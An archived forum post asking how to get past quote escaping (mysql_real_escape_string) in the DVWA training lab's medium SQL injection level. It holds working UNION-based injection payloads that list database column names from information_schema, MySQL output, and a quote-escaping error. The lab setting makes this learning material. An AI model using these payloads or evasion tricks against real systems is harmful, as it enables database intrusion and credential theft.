Jump to content

SQL Injection: How to use tick/quote when it's not possible?


Recommended Posts

I'll use DVWA in this example as the code is available for everyone.
Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.
You can get it here and set it up on your personal lab
Now I know that it's not possible to use tick/quote in SQL Injection Medium Level due to "mysql_real_escape_string()" PHP function.
mysql_real_escape_string() calls MySQL's library function mysql_real_escape_string, which prepends backslashes to the following characters: \x00, \n, \r, \, ', " and \x1a.
That's fine. I solved the Medium solution without using quote. It's easy because the number of data in DVWA is limited. But what happens when there's bigger data? Let me give an example.
I was able to enumerate ALL columns name from current database.
The problem is I wanted to get only column from table "users".
As you can see, the following command actually list out all columns from ALL tables including "users" and also "guestbook"
1 UNION SELECT NULL,CONCAT(column_name) FROM information_schema.columns WHERE table_schema=DATABASE()-- -
This is how it looks like when I selecting "table_schema,table_name,column_name" in MySQL.
mysql> SELECT table_schema,table_name,column_name FROM information_schema.columns WHERE table_schema=DATABASE();
| table_schema | table_name | column_name |
| dvwa | guestbook | comment_id |
| dvwa | guestbook | comment |
| dvwa | guestbook | name |
| dvwa | users | user_id |
| dvwa | users | first_name |
| dvwa | users | last_name |
| dvwa | users | user |
| dvwa | users | password |
| dvwa | users | avatar |
9 rows in set (0.00 sec)
The only solution that I can think of at the moment is by limiting the output only for "users" table by using MySQL WHERE and AND clause.
However, tick is not allowed by "mysql_real_escape_string" function and this code will cause an error.
1 UNION SELECT NULL,CONCAT(column_name) FROM information_schema.columns WHERE table_schema=DATABASE() AND table_name='users'-- -
Error (which expected because of quote)
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'users\'-- -' at line 1
Is there a way to get around this? How do I use tick when it's not possible?
Link to comment
Share on other sites


This topic is now archived and is closed to further replies.

  • Recently Browsing   0 members

    • No registered users viewing this page.
  • Create New...